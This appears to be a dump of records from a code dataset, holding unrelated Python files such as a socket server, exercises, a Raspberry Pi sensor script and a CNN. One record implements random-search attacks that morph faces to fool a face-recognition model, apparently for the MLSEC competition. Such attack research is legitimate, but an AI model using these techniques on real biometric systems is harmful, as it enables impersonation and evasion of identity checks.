necessary\n","repo_name":"yeagerai/yWorkflows-ImageQualityEnhancer-by-Johnathan-2005-c44c1d60","sub_path":"components/image_quality_enhancer/t_image_quality_enhancer.py","file_name":"t_image_quality_enhancer.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5975895862","text":"import socket\nimport os\n\nfrom _thread import *\nfrom handler_server import *\nfrom route_server import *\n\nServerSocket = socket.socket()\nhost = '127.0.0.1'\nport = 42069\nThreadCount = 0\n\ntry:\n ServerSocket.bind((host, port))\nexcept socket.error as e:\n print(str(e))\n\nprint('Waiting for a Connection..')\nServerSocket.listen(5)\n\n\ndef threaded_client(conn):\n while True:\n option, telnet = getOption(conn)\n if not option:\n break\n route( conn, option, telnet )\n conn.close()\n\nwhile True:\n Client, address = ServerSocket.accept()\n print('Connected to: ' + address[0] + ':' + str(address[1]))\n start_new_thread(threaded_client, (Client, ))\n ThreadCount += 1\n print('Thread Number: ' + str(ThreadCount))\nServerSocket.close()\n\n\n\n\n\n\n\n\n\n\n'''import socket\n\nHOST = '127.0.0.1' # Standard loopback interface address (localhost)\nPORT = 65432 # Port to listen on (non-privileged ports are > 1023)\n\nwhile True:\n with socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) as sock:\n sock.bind((HOST, PORT))\n sock.listen()\n conn, addr = sock.accept()\n\n with conn:\n print('Connected by', addr)\n\n while True:\n option, telnet = getOption(conn)\n if not option:\n break\n route( conn, option, telnet )\n\n'''","repo_name":"shankars99/nntp-networks-proj","sub_path":"server/pyScripts/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24518299961","text":"\"\"\"Test cases for the base explorer class.\"\"\"\nimport pytest\n\nfrom predicators import utils\nfrom predicators.envs.cover import CoverEnv\nfrom predicators.explorers import BaseExplorer, create_explorer\nfrom predicators.ground_truth_models import get_gt_nsrts, get_gt_options\nfrom predicators.option_model import _OracleOptionModel\n\n\ndef test_create_explorer():\n \"\"\"Tests for create_explorer.\"\"\"\n utils.reset_config({\"env\": \"cover\"})\n env = CoverEnv()\n nsrts = get_gt_nsrts(env.get_name(), env.predicates,\n get_gt_options(env.get_name()))\n option_model = _OracleOptionModel(env)\n train_tasks = [t.task for t in env.get_train_tasks()]\n # Greedy lookahead explorer.\n state_score_fn = lambda _1, _2: 0.0\n name = \"greedy_lookahead\"\n explorer = create_explorer(name,\n env.predicates,\n get_gt_options(env.get_name()),\n env.types,\n env.action_space,\n train_tasks,\n nsrts=nsrts,\n option_model=option_model,\n state_score_fn=state_score_fn)\n assert isinstance(explorer, BaseExplorer)\n # GLIB explorer.\n atom_score_fn = lambda _: 0.0\n name = \"glib\"\n explorer = create_explorer(name,\n env.predicates,\n get_gt_options(env.get_name()),\n env.types,\n env.action_space,\n train_tasks,\n nsrts=nsrts,\n option_model=option_model,\n babble_predicates=env.predicates,\n atom_score_fn=atom_score_fn)\n assert isinstance(explorer, BaseExplorer)\n # Bilevel planning explorer.\n name = \"exploit_planning\"\n explorer = create_explorer(name,\n env.predicates,\n get_gt_options(env.get_name()),\n env.types,\n env.action_space,\n train_tasks,\n nsrts=nsrts,\n option_model=option_model)\n assert isinstance(explorer, BaseExplorer)\n # Basic explorers.\n for name in [\n \"random_actions\",\n \"random_options\",\n ]:\n explorer = create_explorer(name, env.predicates,\n get_gt_options(env.get_name()), env.types,\n env.action_space, train_tasks)\n assert isinstance(explorer, BaseExplorer)\n # Failure case.\n with pytest.raises(NotImplementedError):\n create_explorer(\"Not a real explorer\", env.predicates,\n get_gt_options(env.get_name()), env.types,\n env.action_space, train_tasks)\n","repo_name":"Learning-and-Intelligent-Systems/predicators","sub_path":"tests/explorers/test_base_explorer.py","file_name":"test_base_explorer.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"66"} +{"seq_id":"4949219631","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\n\ntorch.manual_seed(0)\n\n# dataset code taken from https://colab.research.google.com/github/pytorch/tutorials/blob/gh-pages/_downloads/4e865243430a47a00d551ca0579a6f6c/cifar10_tutorial.ipynb\ntransform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\ndef get_train_test_loaders(train_batch_size=256, test_batch_size=512):\n trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)\n 
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)\n    trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True, num_workers=1)\n    testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, num_workers=1)\n\n    return trainloader, testloader\n","repo_name":"gurnoor6/oml-lion","sub_path":"image_classification/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"7696570571","text":"# Two pointers: fast and slow\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\nclass Solution:\n    def FindKthToTail(self, head, k):\n        if head is None or k == 0:\n            return None\n        kth, end, cnt = None, head, 1\n        while end is not None:\n            if cnt == k:\n                kth = head\n            elif cnt > k:\n                kth = kth.next\n            end = end.next\n            cnt += 1\n        return kth\n","repo_name":"AutuanLiu/Code-Storm2019","sub_path":"Offer/Python/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"11973436470","text":"class Hexagon:\n\n    def __init__(self, l, u=6):  # the side count must be a number, not the string '6'\n        self.ugal = u\n        self.len = l\n\n    def calculate_perimeter(self):\n        # the apothem and area formulas use sqrt(3) (3 ** 0.5), not 3 squared\n        r = (self.len * (3 ** 0.5)) / 2\n        self.radius = r\n        s = ((3 * (3 ** 0.5)) / 2) * (self.len ** 2)\n        self.square = s\n        p = self.ugal * self.len\n        self.perimeter = p\n        print(\"Perimeter: \" + str(self.perimeter) + \"; Radius: \" +\n              str(self.radius) + \"; Square: \" + str(self.square))\n\nhexagon = Hexagon(2)\nhexagon.calculate_perimeter()  # the method prints its result and returns None, so don't print() it\n","repo_name":"pavel-malin/practice_python_and_bash","sub_path":"chall_4.py","file_name":"chall_4.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"8960015007","text":"import adafruit_dht, time, board  # import the required modules\nimport RPi.GPIO as GPIO  # setup()/PWM() below are RPi.GPIO calls, not gpiozero\nfrom gpiozero import LED  # from the gpiozero module import LED\n\n\ndhtDevice = adafruit_dht.DHT11(board.D12)  # pin D12 drives the DHT11 sensor\nled1 = LED(14)  # led1 on GPIO pin 14\nled2 = LED(15)  # led2 on GPIO pin 15\nled3 = LED(18)  # led3 on GPIO pin 18\nled4 = LED(23)  # led4 on GPIO pin 23\nled5 = LED(24)  # led5 on GPIO pin 24\n\nGPIO.setmode(GPIO.BCM)  # use BCM pin numbering\nGPIO.setup(21, GPIO.OUT)  # configure GPIO21 as an output\nventilator = GPIO.PWM(21, 100)  # PWM on GPIO21 at a frequency of 100 Hz\nventilator.start(100)  # start the fan at 100% duty cycle\nteller = 0  # loop counter\nhumidity_som = 0  # running sums, so a real average can be computed\ntemperature_som = 0\n\nwhile True:\n    try:\n        time.sleep(5)  # wait 5 seconds (the module 'time' is not callable)\n        teller += 1\n        temperature_c = dhtDevice.temperature  # read the temperature\n        humidity = dhtDevice.humidity  # read the humidity\n        humidity_som += humidity\n        temperature_som += temperature_c\n        # check the highest threshold first, otherwise the >= 20 branch swallows everything\n        if humidity > 80:\n            ventilator.ChangeDutyCycle(75)\n            print(\"De snelheid van de ventilator is op 75%\\n\")\n        elif humidity > 60:\n            ventilator.ChangeDutyCycle(50)\n            print(\"De snelheid van de ventilator is op 50%\\n\")\n        elif humidity > 40:\n            ventilator.ChangeDutyCycle(25)\n            print(\"De snelheid van de ventilator is op 25%\\n\")\n        elif humidity >= 20:\n            ventilator.ChangeDutyCycle(20)\n            print(\"De snelheid van de ventilator is op 20%\\n\")\n        else:\n            ventilator.ChangeDutyCycle(0)\n            print(\"De snelheid van de ventilator is op 0%\\n\")\n\n        # same ordering fix for the temperature ladder: highest first\n        if temperature_c > 27:\n            led1.on()\n            led2.on()\n            led3.on()\n            led4.on()\n            led5.on()\n            print(\"led1 led2\\n led3\\n led4\\n led5\\n\")\n        elif temperature_c > 24:\n            led1.on()\n            led2.on()\n            led3.on()\n            led4.on()\n            led5.off()\n            print(\"led1 led2\\n led3\\n led4\\n\")\n        elif temperature_c > 21:\n            led1.on()\n            led2.on()\n            led3.on()\n            led4.off()\n            led5.off()\n            print(\"led1 led2\\n led3\\n\")\n        elif temperature_c > 18:\n            led1.on()\n            led2.on()\n            led3.off()\n            led4.off()\n            led5.off()\n            print(\"led1 led2\\n\")\n        elif temperature_c >= 15:\n            led1.on()\n            led2.off()\n            led3.off()\n            led4.off()\n            led5.off()\n            print(\"led1 is aan\")\n        else:\n            led1.off()\n            led2.off()\n            led3.off()\n            led4.off()\n            led5.off()\n            print(\"alles uit\")\n        if teller == 12:\n            # average the 12 accumulated readings, not just the last one\n            humidity_gemid = humidity_som / 12\n            temperature_c_gemid = temperature_som / 12\n            print(\"Temperatuur gemiddelde: {:.1f} C Humidity gemiddelde: {}% \".format(\n                temperature_c_gemid, humidity_gemid))\n            teller = 0\n            humidity_som = 0\n            temperature_som = 0\n    except RuntimeError as error:  # transient read errors are normal for the DHT11\n        print(error.args[0])\n        time.sleep(2)\n        continue\n    except KeyboardInterrupt:  # control + c\n        print(\"programma is onderbroken\")\n        break  # leave the loop instead of swallowing the interrupt\n    except Exception as error:  # any other, unknown error\n        dhtDevice.exit()  # release the sensor (dht11)\n        raise error  # re-raise\n","repo_name":"ZyaadW/python_oef","sub_path":"examen6iict_vorigJaar.py","file_name":"examen6iict_vorigJaar.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"32896113972","text":"#class - a class is simply the type of an object; it is also called a blueprint.\r\n#object - an object is an instance of a class and has its own state.\r\nclass Computer(object):\r\n\t\"\"\"docstring for Computer\"\"\"\r\n\tdef config(self):\r\n\t\tprint(\"i5, 16GB, 1TB\")\r\n\r\ncom1 = Computer()\r\ncom1.config()\r\n\t\r\n","repo_name":"sunilvarma9697/Code-Basics","sub_path":"Classand Objects.py","file_name":"Classand Objects.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"11264016146","text":"def minOperations(boxes):\n\n    ans = []\n    for x in range(len(boxes)):\n        # Left side\n        left_counter = 0\n        for l in range(len(boxes)):\n            if l < x:\n                if boxes[l] == '1':\n                    left_counter += (x - l)\n        # Right side\n        right_count = 0\n        for r in range(len(boxes)):\n            if r > x:\n                if boxes[r] == '1':\n                    right_count += (r - x)\n        ans.append(left_counter + right_count)\n    return ans\n\n\nboxes = \"110\"\nprint(minOperations(boxes))\n\n\n\n\"\"\"\nexpected ans: [1, 1, 3]\n1 move to move all balls to box 1. 1 move to move all balls to box 2\n3 moves to move all balls to box 3\n\"\"\"\n","repo_name":"AbhiByte/PracticeProblems","sub_path":"LeetCode Problems/Python/1769 Minimum Number of Operations to Move All Balls to Each Box.py","file_name":"1769 Minimum Number of Operations to Move All Balls to Each Box.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"19855074607","text":"import numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.layers import Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\n\npath = \"TextDetectionUsingNeuralNetworks/myData\"  # forward slash avoids backslash-escape issues\ntestRatio = 0.2\nvalRatio = 0.2\n\nimages = []\nclassNo = []\nmyList = os.listdir(path)\nprint(\"Total no of Classes detected\", len(myList))\nnoOfClasses = len(myList)\nimageDimensions = (32, 32, 3)\nprint(\"Importing Classes.....\")\nfor x in range(0, noOfClasses):\n    myPicList = os.listdir(path + \"/\" + str(x))  # read each digit folder\n    for y in myPicList:\n        curImg = cv2.imread(path + \"/\" + str(x) + \"/\" + y)  # each image of the respective folder\n        curImg = cv2.resize(curImg, (imageDimensions[0], imageDimensions[1]))  # resize 180x180 to 32x32, since large images are computationally expensive ('imageDimentions' was a NameError)\n        images.append(curImg)  # all images stored\n        classNo.append(x)  # all class numbers stored\n    print(x, end=\" \")\nprint(\" \")\n\n# create arrays\nimages = np.array(images)\nclassNo = np.array(classNo)\n\nprint(images.shape)  # count, height, width, number of colours (RGB) = 3\nprint(classNo.shape)\n\n# Splitting Data\nX_train, X_test, y_train, y_test = train_test_split(images, classNo, test_size=testRatio)\n# Validation\nX_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train, test_size=valRatio)\n\nprint(X_train.shape, y_train.shape)\n\n# number of samples per class in y_train\nnumOfSamples = []\nfor x in 
range(0, noOfClasses):\n    numOfSamples.append(len(np.where(y_train == x)[0]))  # number of images (digits 0-9) present for each class in y_train\nprint(numOfSamples)\n\nplt.figure(figsize=(10, 5))\nplt.bar(range(0, noOfClasses), numOfSamples)\nplt.title(\"No of images for each Class\")\nplt.xlabel(\"Class ID\")\nplt.ylabel(\"Number of Images\")\nplt.show()\n\nprint(X_train[9].shape)\ndef preProcessing(img):\n    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)  # 3 channels to 1\n    img = cv2.equalizeHist(img)  # equalise the lighting of the image\n    img = img / 255  # normalisation (rescale 0-255 to 0-1)\n    return img\n\n# preprocess all the images using map and convert back to arrays\nX_train = np.array(list(map(preProcessing, X_train)))\nX_test = np.array(list(map(preProcessing, X_test)))  # was assigned to X_train by mistake, which overwrote the training set\nX_validation = np.array(list(map(preProcessing, X_validation)))\n\"\"\"img = X_train[9]\nimg = cv2.resize(img, (300,300))\ncv2.imshow(\"preprocessed\", img)\ncv2.waitKey(0)\nprint(img.shape)\"\"\"\n\n\n# add a depth of 1 as a 4th dimension so the CNN runs properly\nX_train = X_train.reshape(X_train.shape[0], X_train.shape[1], X_train.shape[2], 1)\nX_test = X_test.reshape(X_test.shape[0], X_test.shape[1], X_test.shape[2], 1)\nX_validation = X_validation.reshape(X_validation.shape[0], X_validation.shape[1], X_validation.shape[2], 1)\n\n\n# Augment the data so it looks more realistic\ndataGen = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, zoom_range=0.2, shear_range=0.1, rotation_range=10)\ndataGen.fit(X_train)  # compute the augmentation statistics on the training set\n\n# one-hot encoding\ny_train = to_categorical(y_train, noOfClasses)\ny_test = to_categorical(y_test, noOfClasses)\ny_validation = to_categorical(y_validation, noOfClasses)\n\n#### CREATING THE MODEL\ndef myModel():\n    noOfFilters = 60\n    sizeOfFilter1 = (5, 5)\n    sizeOfFilter2 = (3, 3)\n    sizeOfPool = (2, 2)\n    noOfNodes = 500\n\n    model = Sequential()\n    model.add((Conv2D(noOfFilters, sizeOfFilter1, input_shape=(imageDimensions[0],\n                      imageDimensions[1], 1), activation='relu')))\n    model.add((Conv2D(noOfFilters, sizeOfFilter1, activation='relu')))\n    model.add(MaxPooling2D(pool_size=sizeOfPool))\n    model.add((Conv2D(noOfFilters // 2, sizeOfFilter2, activation='relu')))\n    model.add((Conv2D(noOfFilters // 2, sizeOfFilter2, activation='relu')))\n    model.add(MaxPooling2D(pool_size=sizeOfPool))\n    model.add(Dropout(0.5))\n\n    model.add(Flatten())\n    model.add(Dense(noOfNodes, activation='relu'))\n    model.add(Dropout(0.5))\n    model.add(Dense(noOfClasses, activation='softmax'))\n\n    model.compile(Adam(lr=0.001), loss='categorical_crossentropy', metrics=['accuracy'])\n    return model\n\nmodel = myModel()\nprint(model.summary())\n","repo_name":"rajesh0025/Projects","sub_path":"TextDetectionUsingNeuralNetworks/TextDtection.py","file_name":"TextDtection.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"31203622391","text":"from datasets import load_dataset\n\nfrom mlproject.decorators import configurable\n\n\n@configurable\ndef build_dataset(\n    dataset_name: str,\n    data_dir: str,\n    sets_to_include=None,\n):\n    if sets_to_include is None:\n        sets_to_include = [\"train\", \"validation\"]\n\n    dataset = {}\n    for set_name in sets_to_include:\n        data = load_dataset(\n            path=dataset_name,\n            split=set_name,\n            cache_dir=data_dir,\n            task=\"image-classification\",\n        )\n        dataset[set_name] = data\n\n    return 
dataset\n","repo_name":"AntreasAntoniou/minimal-ml-template","sub_path":"mlproject/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"66"} +{"seq_id":"73319978129","text":"import torch\nimport torch.nn as nn\nimport json\nimport subprocess\nfrom tinydb import TinyDB\nimport uuid\n\nimport shutil\nfrom PIL import Image, ImageDraw, ImageFilter\n\n\nfrom torchvision.transforms.functional import adjust_contrast, adjust_saturation, adjust_brightness\n\nimport utils.conversions as con\nfrom utils.preprocessing import Preprocessor\n\n\nclass AdversaModel(nn.Module):\n def __init__(self, api_key, save_name=None):\n super().__init__()\n MLSEC_API_KEY = api_key\n self.url = f\"https://api.mlsec.io/api/facerecognition/submit_sample/?api_token={MLSEC_API_KEY}\"\n self.folder = \"/scratch/ameinke03/\"\n if save_name is None:\n self.save_name = str(uuid.uuid1())\n else:\n self.save_name = save_name\n self.save_name += '.png'\n \n def forward(self, x):\n raise NotImplemented()\n \n def forward_class(self, x, y_target, y_source=0):\n img = con.torch_to_PIL(x)\n image_path = self.folder + self.save_name\n img.save(image_path)\n url = self.url + f\"&source={y_source}&target={y_target}\"\n response = subprocess.run(['curl', '-X', 'POST', '--data-binary', f'@{image_path}', f'{url}'], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)\n\n model_result = self.parse_response(response)\n return model_result\n \n def parse_response(self, response):\n result = response.stdout.decode(\"utf-8\").split('\\n')[0]\n model_result = json.loads(result)\n return model_result\n \n \nclass SquareAttackWrapper(nn.Module):\n def __init__(self, model, y_source, y_target, weights=torch.ones(2), verbose=False):\n super().__init__()\n self.model = model\n self.weights = weights\n self.y_source = y_source\n self.y_target = y_target\n self.verbose = verbose\n \n def forward(self, x):\n response = self.model.forward_class(x[0], y_target=self.y_target, y_source=self.y_source)\n score = compute_score_from_output(response)\n if self.verbose:\n print(f'Response:\\t{response}')\n print(f'Score:\\t{score}')\n return torch.tensor([4, score]).unsqueeze(0)\n \n \n# random search with attack parameters: position_x, position_y, width, height, lambda, mask_softener\nclass ImageInterpolator(nn.Module):\n def __init__(self, img_source, img_target):\n super().__init__()\n self.img_s = img_source\n self.img_t = img_target\n self.x_s = con.PIL_to_torch(self.img_s)\n \n def forward(self, v):\n box_s = [int(v[i].item()) for i in range(4)]\n box_t = [int(v[i].item()) for i in range(4,8)]\n border_softening = int(v[8])\n lam = torch.sigmoid(v[9]) \n \n img_t_cropped = self.img_t.crop(tuple(box_t))\n width = box_s[2] - box_s[0]\n height = box_s[3] - box_s[1]\n \n x_t_cropped = con.PIL_to_torch(img_t_cropped.resize((width,height)))\n x_t = torch.zeros_like(self.x_s)\n x_t[:,box_s[1]:box_s[3],box_s[0]:box_s[2]] = x_t_cropped\n \n mask = self.generate_mask(box_s, border_softening)\n \n # mask -= self.create_gaussian_dot(v[16:22])\n mask = torch.clip(mask, 0, 1)\n \n # x_s_transformed = self.transform(v[10:13], self.x_s)\n x_s_transformed = self.x_s\n x_t_transformed = self.transform(v[13:16], x_t)\n sample = mask*(lam*x_t_transformed + (1-lam)*x_s_transformed) + (1-mask)*x_s_transformed\n \n return sample\n \n def transform(self, param_vec, sample):\n contrast_factor = param_vec[0].exp()\n saturation_factor = param_vec[1].exp()\n 
brightness_factor = param_vec[2].exp()\n \n transformed = adjust_contrast(sample, contrast_factor=contrast_factor)\n transformed = adjust_saturation(transformed, saturation_factor=saturation_factor)\n transformed = adjust_brightness(transformed, brightness_factor=brightness_factor)\n \n return transformed\n \n def create_gaussian_dot(self, param_vec):\n pos_x, pos_y = param_vec[0], param_vec[1]\n var = param_vec[2]**2 + 1e-1\n color = param_vec[3:6]\n \n shape = self.x_s.shape\n xx, yy = torch.arange(shape[1]), torch.arange(shape[2])\n gauss = ( -((xx[:,None]-pos_x)**2 + (yy[None,:]-pos_y)**2) / var ).exp()\n gauss_dot = color[:,None,None] * gauss[None,:,:]\n return gauss_dot\n \n \n def generate_mask(self, box, border_softening):\n mask = torch.zeros_like(self.x_s)\n mask[:, box[1]:box[3], box[0]:box[2]] = 1\n\n for i in range(border_softening):\n smoothed_value = 1-float(i)/border_softening\n mask[:, box[1]+i, box[0]:box[2]] = 1 - smoothed_value\n mask[:, box[1]:box[3], box[0]+i] = 1 - smoothed_value\n mask[:, box[3]-i, box[0]:box[2]] = 1 - smoothed_value\n mask[:, box[1]:box[3], box[2]-i] = 1 - smoothed_value\n\n for i in range(border_softening):\n for j in range(border_softening):\n smoothed_value = max([float(i+j)/border_softening-1, 0])\n mask[:, box[1]+i, box[0]+j] = smoothed_value\n mask[:, box[1]+i, box[2]-j] = smoothed_value\n mask[:, box[3]-i, box[0]+j] = smoothed_value\n mask[:, box[3]-i, box[2]-j] = smoothed_value\n\n return mask\n# def generate_mask(self, box, border_softening):\n# mask = torch.zeros_like(self.x_s)\n# mask[:, box[1]:box[3], box[0]:box[2]] = 1\n\n# for i in range(border_softening):\n# smoothed_value = 1-float(i)/border_softening\n# mask[:, box[1]+i, box[0]:box[2]] = 1 - smoothed_value\n# mask[:, box[1]:box[3], box[0]+i] = 1 - smoothed_value\n# mask[:, box[3]-i, box[0]:box[2]] = 1 - smoothed_value\n# mask[:, box[1]:box[3], box[2]-i] = 1 - smoothed_value\n\n# mask[:, box[1]:box[1]+i, box[0]:box[0]+i] = 0.1\n# mask[:, box[1]:box[1]+i, box[2]-i:box[2]] = 0.1\n# mask[:, box[3]-i:box[3], box[0]:box[0]+i] = 0.1\n# mask[:, box[3]-i:box[3], box[2]-i:box[2]] = 0.1\n \n# return mask\n\ndef compute_score_from_output(output):\n conf = output['confidence']\n stealth = output['stealthiness']\n if conf<0.01:\n return -1. + stealth\n if conf+stealth < 1.:\n return conf\n elif stealth<0.5:\n return conf + stealth \n elif conf<1.:\n return 2. + conf\n else:\n return 2. 
+ conf + stealth\n\n \nclass RandomSearchWrapper(nn.Module):\n def __init__(self, model, interpolator, source_id, target_id):\n super().__init__()\n self.model = model\n self.interpolator = interpolator\n self.source_id = source_id\n self.target_id = target_id\n \n def forward(self, v):\n sample = self.interpolator(v)\n model_output = self.model.forward_class(sample, self.target_id, y_source=self.source_id)\n return compute_score_from_output(model_output)\n \n \nclass RandomSearchAttack():\n def __init__(self, wrapper, epochs=20, magnitude=50, verbose=True, step_size=None):\n self.wrapper = wrapper\n self.magnitude = magnitude\n self.epochs = epochs\n self.verbose = verbose\n \n magnitude = self.magnitude\n if step_size is None:\n self.step_size = torch.tensor([20.,20.,20,20, \n 20.,20,20,20, \n 5, .1] + 6*[0.1]\n + [50, 50, 2, .2, .2, .2]) / magnitude\n else:\n self.step_size = step_size\n \n def run(self, v):\n prev_point = v\n\n prev_value = self.wrapper(prev_point)\n if self.verbose:\n print(f'Starting value: {prev_value}')\n\n magnitude = self.magnitude\n step_size = self.step_size\n\n epochs = self.epochs\n for i in range(5*epochs):\n if i==epochs:\n magnitude = 30\n elif i==2*epochs:\n magnitude = 10\n elif i==3*epochs:\n magnitude = 3\n elif i==4*epochs:\n magnitude = 1\n elif i==5*epochs:\n magnitude = .5\n\n delta = magnitude*step_size*torch.randn(len(v))\n \n try:\n new_point = prev_point + delta\n value = self.wrapper(new_point)\n except:\n continue\n\n if self.verbose:\n # print('')\n # print(i)\n print(f'{value}')\n # print('{new_point[:4]}\\n{new_point[4:8]}\\n{new_point[8:]}')\n\n if value>prev_value:\n prev_value = value\n prev_point = prev_point + delta\n \n if value>3.0:\n break;\n\n return prev_point\n\n \nclass AttackScheduler():\n def __init__(self, api_key, extension_factor=1.):\n self.model = AdversaModel(api_key)\n self.preprocessor = Preprocessor(extension_factor=1.)\n self.db = TinyDB('evals/results.json')\n \n def attack_pair(self, source_id, target_id, verbose=True, epochs=None):\n if epochs is None:\n epochs = 100\n \n assert source_id!=target_id\n img_s = Image.open(f'adversa_data/{source_id}_{source_id}.png')\n img_t = Image.open(f'adversa_data/{target_id}_{target_id}.png')\n\n interpolator = ImageInterpolator(img_s, img_t)\n \n _, box_s, _ = self.preprocessor(img_s)\n _, box_t, _ = self.preprocessor(img_t)\n\n initial_point = torch.cat([torch.tensor(box_s), \n torch.tensor(box_t), \n torch.tensor([50, 2.0]), \n torch.zeros(6), \n torch.tensor([100,100,5,.5,.5,.5])\n ], 0)\n \n wrapper = RandomSearchWrapper(self.model, interpolator, source_id, target_id)\n attack = RandomSearchAttack(wrapper, verbose=verbose, epochs=epochs)\n\n final_point = attack.run(initial_point)\n sample = interpolator(final_point)\n \n output = self.model.forward_class(sample, target_id, y_source=source_id)\n \n self.store_output(output, source_id, target_id, final_point)\n \n \n def store_output(self, output, source_id, target_id, final_point):\n doc_id = self.get_doc_id(source_id, target_id)\n entry = self.db.get(doc_id=doc_id)\n assert entry['Name'] == f'{source_id}_{target_id}'\n \n if output['success'] and output['confidence']>entry['confidence']:\n entry['confidence'] = output['confidence']\n entry['success'] = output['success']\n entry['stealthiness'] = output['stealthiness']\n entry['v'] = final_point.tolist()\n \n shutil.copyfile(self.model.folder + self.model.save_name, \n f'adversa_results/{source_id}_{target_id}.png')\n self.db.update(entry, doc_ids=[doc_id])\n 
print('Replaced old entry')\n print(entry)\n \n def get_doc_id(self, source_id, target_id):\n doc_id = 0\n stop = False\n for i in range(10):\n if stop:\n break\n for j in range(10):\n if i==j:\n continue\n else:\n doc_id += 1\n if i==source_id and j==target_id:\n stop = True\n break\n return doc_id\n \n def summarize_results(self):\n conf = sum([el['confidence'] for el in self.db.all()])\n stealth = sum([el['stealthiness'] for el in self.db.all()])\n print(f'Confidence: {conf}')\n print(f'Stealthiness: {stealth}')\n return conf, stealth\n\n \nclass AlternateAttackScheduler(AttackScheduler): \n def attack_pair(self, source_id, target_id, verbose=True, epochs=None):\n if epochs is None:\n epochs = 100\n \n assert source_id!=target_id\n \n wrapper = AlternateRandomSearchWrapper(self.model, source_id, target_id)\n \n step_size = torch.tensor([3, 3, 3, 3, .2, .2])\n attack = RandomSearchAttack(wrapper, verbose=verbose, epochs=epochs, step_size=step_size)\n \n img_s = Image.open(f'adversa_data/{source_id}_{source_id}.png')\n w, h = img_s.size[0], img_s.size[1]\n x, y = 0, 0\n angle = 0\n blur = 0\n \n initial_point = torch.tensor([w, h, x, y, angle, blur])\n final_point = attack.run(initial_point)\n sample = wrapper.interpolate(final_point)\n \n output = self.model.forward_class(sample, target_id, y_source=source_id)\n \n self.store_output(output, source_id, target_id, final_point)\n \n \nclass AlternateRandomSearchWrapper(nn.Module):\n def __init__(self, model, source_id, target_id):\n super().__init__()\n self.model = model\n self.source_id = source_id\n self.target_id = target_id\n self.img_s = Image.open(f'adversa_data/{source_id}_{source_id}.png')\n self.img_t = Image.open(f'adversa_data/{target_id}_{target_id}.png')\n self.mask = Image.open(f'segmentation_masks/{target_id}_{target_id}.png').convert(\"L\") \n self.EPS = 1\n \n def forward(self, v):\n sample = self.interpolate(v)\n model_output = self.model.forward_class(sample, self.target_id, y_source=self.source_id)\n return compute_score_from_output(model_output)\n \n def interpolate(self, v):\n mask_im_blur = self.mask.filter(ImageFilter.GaussianBlur(int(v[5].abs().item()+self.EPS)))\n back_im = self.img_s.copy()\n w, h = int(v[0].abs().item()+self.EPS), int(v[1].abs().item()+self.EPS) #img_t.size\n x, y = int(v[2]), int(v[3]) #0, 0\n angle = v[4]\n new_img_t = self.img_t.resize((w,h)).rotate(angle)\n new_mask_im_blur = mask_im_blur.resize((w,h)).rotate(angle)\n back_im.paste(new_img_t, (x, y), new_mask_im_blur)\n \n sample = con.PIL_to_torch(back_im)\n return sample\n","repo_name":"AlexMeinke/FacialRecognitionAttack","sub_path":"utils/adversa.py","file_name":"adversa.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"74667927891","text":"from datetime import datetime\nfrom math import floor\nimport random\nimport hashlib\nimport re\nimport json\n\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.db.models import Count, Q, F, FloatField\nfrom django.db.models.functions import Cast, Coalesce\n\nfrom project.emails import send_email\nfrom .models import *\n\n\nGAMEPLAY_OPTIONS = {\n \"lynching_shared\": {\"description\": \"Everyone can see public lynching votes as they are cast\" },\n 
